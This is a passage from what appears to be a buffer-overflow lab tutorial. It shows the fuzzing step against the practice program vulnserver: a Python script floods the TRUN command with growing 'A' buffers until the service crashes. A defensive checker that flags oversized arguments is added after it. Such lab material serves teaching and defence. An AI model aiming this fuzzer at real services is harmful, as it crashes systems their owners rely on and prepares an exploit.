# Step 1: Fuzzing

Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer to crash the executable's `TRUN` command:

{% code title="fuzzer.py" %}

```python
#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
                         #
host = "192.168.1.2"     #
port = 9999              #
                         #
#------------------------#

# Start with 100 bytes and grow the buffer by 100 bytes each round
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)           # don't hang forever once the service stops answering
        s.connect((host, port))

        payload = b"TRUN /.:/" + buffer

        print(f"[+] Sending the payload of length {len(buffer)}...")
        s.sendall(payload)        # sendall() loops until every byte has been written
        s.close()

        sleep(1)
        buffer += b"A" * 100

    except OSError:
        # connect() is refused, or the send is reset/times out, once vulnserver has crashed
        print(f"Fuzzer crashed at {len(buffer)} bytes")
        sys.exit()
```

{% endcode %}

Here we build the payload from byte literals (`b""`) instead of calling `.encode()` on a string, since `.encode()` turns each byte into its Unicode representation:

![Unicode](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MgHb_2EbeRRpJ4Xwqoj%2F-MgHdTwSVXSvKcWzA5Ry%2Fimage.png?alt=media\&token=4c6fd056-6137-4f26-a94f-4cbb6ba81fef)

After a while, vulnserver crashes:

![Crash](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MgCpzpGWQmGqKiV27Fl%2F-MgCq56bHAt8aQcu_uGS%2Fimage.png?alt=media\&token=a47fc0c4-99ec-401e-92f2-19ebf0a4ceb3)

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.
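The same traffic seen from the defender's side, as an added example that is not part of the original page: a small checker that parses vulnserver-style commands and flags an argument far longer than a real client would send, which is how a monitoring rule would notice this fuzzing run. The command regex, the per-command limits and the sample commands are all constructed for this demo.

```python
#!/usr/bin/python3
# Added example, not from the original page: flag command arguments that are
# suspiciously long. Limits and samples below are constructed for this demo.
import re
from typing import Optional

# Hypothetical per-command argument limits; a real deployment would take these
# from the protocol spec. Anything longer is reported.
MAX_ARG_LEN = {"TRUN": 64, "STATS": 64, "HELP": 0}
CMD_RE = re.compile(rb"^([A-Z]+)(?: (.*))?$", re.DOTALL)

def inspect_command(raw: bytes) -> Optional[dict]:
    """Return a finding for an oversized/unknown command, or None if it looks normal."""
    m = CMD_RE.match(raw.rstrip(b"\r\n"))
    if not m:
        return {"cmd": None, "reason": "unparsable", "length": len(raw)}
    cmd = m.group(1).decode()
    arg = m.group(2) or b""
    limit = MAX_ARG_LEN.get(cmd)
    if limit is None:
        return {"cmd": cmd, "reason": "unknown command", "length": len(arg)}
    if len(arg) > limit:
        # Record the dominant byte: overflow probes are usually one repeated
        # character, like the "A" * N buffer the fuzzer above sends.
        top = max(set(arg), key=arg.count)
        return {"cmd": cmd, "reason": "oversized argument", "length": len(arg),
                "top_byte": bytes([top]), "top_ratio": arg.count(top) / len(arg)}
    return None

# Constructed sample commands, as a sensor on port 9999 might capture them
SAMPLES = [
    b"HELP\r\n",
    b"TRUN /.:/hello\r\n",
    b"TRUN /.:/" + b"A" * 2900 + b"\r\n",
    b"FOO bar\r\n",
]

def scan(samples):
    """Run inspect_command over every sample and keep only the findings."""
    return [f for f in (inspect_command(s) for s in samples) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```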
